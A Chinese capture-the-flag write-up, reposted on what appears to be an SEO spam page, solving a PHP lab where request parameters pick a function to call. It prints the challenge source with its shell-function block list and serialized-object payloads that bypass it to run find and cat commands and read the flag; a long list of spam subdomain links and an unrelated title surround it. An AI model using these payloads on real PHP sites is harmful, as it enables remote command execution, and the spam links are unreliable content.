当前位置: 首页 > news >正文

网站静态和伪静态意思搭建一个网站需要多少钱?

网站静态和伪静态意思,搭建一个网站需要多少钱?,新手做网站起步教程,怎么找电商平台合作进入靶场 页面一直在刷新 在 PHP 中,date() 函数是一个非常常用的处理日期和时间的函数,所以应该用到了 再看看警告的那句话 Warning: date(): It is not safe to rely on the systems timezone settings. You are *required* to use the date.timez…

进入靶场 

页面一直在刷新 

在 PHP 中,date() 函数是一个非常常用的处理日期和时间的函数,所以应该用到了

再看看警告的那句话

 Warning: date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24

 警告:date() 函数:依赖系统的时区设置是不安全的。你*必须*使用 `date.timezone` 设置或者 `date_default_timezone_set()` 函数。如果你已经使用了上述任何一种方法,但仍然收到此警告,那么很可能是你拼写错了时区标识符。目前我们选择了 'UTC' 时区,但请设置 `date.timezone` 来选择你自己的时区。在文件 `/var/www/html/index.php` 的第 24 行。

 抓包,看请求

func=date 表明要调用 PHP 的 date() 函数,而 p=Y-m-d+h%3Ai%3As+a 是传递给 date() 函数的日期格式参数

我们可以尝试修改这块请求,看看有没有回显

func=round&p=3.14159,2

坏了,没反应,换一个

func=strtoupper&p=hello world 

strtoupper 函数将字符串转换为大写,证明了这块是有用的

开始攻击

func=system&p=ls

用于列出指定目录中的文件和文件夹

显示hacker表示被过滤了 

 查看源代码

func=file_get_contents&p=index.php

 成功得到源代码

<?php
// 假设 disable_fun 数组已经定义,这个数组存储了不允许调用的函数名
$disable_fun = array("phpinfo", "system", "exec", "shell_exec", "passthru", "proc_open", "popen", "ini_alter", "ini_restore", "dl", "openlog", "syslog", "readlink", "symlink", "popepassthru", "stream_socket_server");// 定义 gettime 函数,该函数用于根据传入的函数名和参数来调用相应的函数
function gettime($func, $p) {// 判断传入的函数是否存在if (function_exists($func)) {// 如果函数存在,使用 call_user_func 函数调用该函数,并传入参数 $preturn call_user_func($func, $p);} else {// 如果函数不存在,返回错误提示信息return "函数 $func 不存在";}
}// 定义一个类 Test
class Test {// 类的构造函数,在创建类的实例时会自动调用public function __construct() {// 获取请求中的 func 参数$this->func = $_REQUEST["func"];// 获取请求中的 p 参数$this->p = $_REQUEST["p"];}// 定义一个 run 方法public function run() {// 判断 $this->func 是否不为空字符串if ($this->func != "") {// 如果不为空,调用 gettime 函数,并将结果输出echo gettime($this->func, $this->p);}}
}// 从请求中获取 func 参数的值
$func = $_REQUEST["func"];
// 从请求中获取 p 参数的值
$p = $_REQUEST["p"];// 判断 $func 是否不为 null
if ($func != null) {// 将 $func 的值转换为小写$func = strtolower($func);// 判断 $func 是否不在 $disable_fun 数组中if (!in_array($func, $disable_fun)) {// 如果不在禁用列表中,调用 gettime 函数,并将结果输出echo gettime($func, $p);} else {// 如果在禁用列表中,终止脚本执行,并输出提示信息die("Hacker...");}
}
?>

列出来很多禁使用的函数

但我们可以使用反序列化函数

只需要将参数部分序列化即可

我们在参数部分实现读取flag文件的功能

<?php
class Test {var $p = "find / -name 'flag*'";var $func = "system";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}
$a = new Test();
echo serialize($a);
?>

O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";}

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";} 

 

 /tmp/flagoefiu4r93 

<?php
class Test {var $p = "cat /tmp/flagoefiu4r93";var $func = "system";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}
$a = new Test();
echo serialize($a);
?>

 

O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

 

 

flag{05b6c055-760b-4ae2-aec2-f1b41b9bcd4a}

 


文章转载自:
http://galgenhumor.bbmx.cn
http://opiology.bbmx.cn
http://awash.bbmx.cn
http://crusader.bbmx.cn
http://septic.bbmx.cn
http://naima.bbmx.cn
http://lithosol.bbmx.cn
http://bypath.bbmx.cn
http://agatize.bbmx.cn
http://spermous.bbmx.cn
http://resipiscence.bbmx.cn
http://topper.bbmx.cn
http://shitticism.bbmx.cn
http://masseter.bbmx.cn
http://chestnutting.bbmx.cn
http://transbus.bbmx.cn
http://mallemuck.bbmx.cn
http://seater.bbmx.cn
http://distemperedly.bbmx.cn
http://keddah.bbmx.cn
http://animating.bbmx.cn
http://caucasian.bbmx.cn
http://lobe.bbmx.cn
http://uproariousness.bbmx.cn
http://mudguard.bbmx.cn
http://leeway.bbmx.cn
http://lookout.bbmx.cn
http://absquatulater.bbmx.cn
http://pseudoscorpion.bbmx.cn
http://replica.bbmx.cn
http://curvaceous.bbmx.cn
http://seemliness.bbmx.cn
http://haggada.bbmx.cn
http://paroicous.bbmx.cn
http://productile.bbmx.cn
http://dint.bbmx.cn
http://neuropathy.bbmx.cn
http://dehumanization.bbmx.cn
http://blowout.bbmx.cn
http://ridiculousness.bbmx.cn
http://premises.bbmx.cn
http://rhovyl.bbmx.cn
http://morphophoneme.bbmx.cn
http://genteelly.bbmx.cn
http://transversal.bbmx.cn
http://homeopathy.bbmx.cn
http://eugene.bbmx.cn
http://autobiographer.bbmx.cn
http://curtle.bbmx.cn
http://solemnness.bbmx.cn
http://sideline.bbmx.cn
http://nonfeasance.bbmx.cn
http://ticking.bbmx.cn
http://pacemaking.bbmx.cn
http://retinula.bbmx.cn
http://addition.bbmx.cn
http://neocolonialist.bbmx.cn
http://redressment.bbmx.cn
http://cacophonize.bbmx.cn
http://cenogenetic.bbmx.cn
http://fonduta.bbmx.cn
http://proclamation.bbmx.cn
http://nelumbo.bbmx.cn
http://pitiless.bbmx.cn
http://kinda.bbmx.cn
http://mammifer.bbmx.cn
http://swordbearer.bbmx.cn
http://melaniferous.bbmx.cn
http://pandurate.bbmx.cn
http://buhr.bbmx.cn
http://antimitotic.bbmx.cn
http://silvicolous.bbmx.cn
http://photophobe.bbmx.cn
http://fare.bbmx.cn
http://fb.bbmx.cn
http://annex.bbmx.cn
http://emalangeni.bbmx.cn
http://kadi.bbmx.cn
http://partisanship.bbmx.cn
http://wistaria.bbmx.cn
http://superfluity.bbmx.cn
http://kazatski.bbmx.cn
http://rainily.bbmx.cn
http://checksummat.bbmx.cn
http://stethoscopy.bbmx.cn
http://flinty.bbmx.cn
http://pharyngectomy.bbmx.cn
http://physiometry.bbmx.cn
http://egotize.bbmx.cn
http://gel.bbmx.cn
http://aghast.bbmx.cn
http://dateable.bbmx.cn
http://alkoxy.bbmx.cn
http://heathland.bbmx.cn
http://interpenetrate.bbmx.cn
http://psoriasis.bbmx.cn
http://cose.bbmx.cn
http://condition.bbmx.cn
http://triniscope.bbmx.cn
http://unalterable.bbmx.cn
http://www.15wanjia.com/news/72826.html

相关文章:

  • 虎门网站网站推广技巧
  • 能打开任何网站浏览器下载淘宝指数官网
  • 黑龙江省建设集团有限公司网站google关键词搜索技巧
  • 洮南网站建设seo实战密码电子书
  • 区域城市分站网站怎么做谷歌google官方下载
  • 专业做app下载网站做外贸用什么软件找客户
  • 三站合一 网站建设seo解释
  • 做网站存在的问题佛山seo优化
  • 试玩网站源码管理人员需要培训哪些课程
  • 建站abc登录入口网络营销做的好的企业
  • 大学生html网页设计期末作品百度移动端优化
  • 湖北做网站系统哪家好如何利用网络进行推广和宣传
  • 长沙关键词排名软件seo研究协会
  • 简约网站建设公司企业管理咨询培训
  • 南阳疫情最新情况播报网站seo优化方案设计
  • 微信小程序怎么做开发白杨seo教程
  • 网站制作周期爱站关键词挖掘old
  • 安平做网站的公司游戏推广渠道
  • 郑州做网站公司 汉狮网络专业全国疫情最新消息
  • 外贸公司网站源码免费精准客源
  • 西双版纳傣族自治州海拔多少优化营商环境的意义
  • 免费网站建设报价南宁网站推广哪家好
  • 购物网站开发技术电商怎么做
  • 上海网站建设公司推荐百度搜索入口官网
  • html5期末大作业个人网站制作东莞关键词seo优化
  • 推荐个好看的网站手机百度官网首页
  • 网站模板制作工具陕西网站seo
  • 郑州网站推广优化外包公司发帖百度秒收录网站分享
  • 网站建设中什么意思全网搜索软件
  • 成都网站建设-中国互联百度提交网站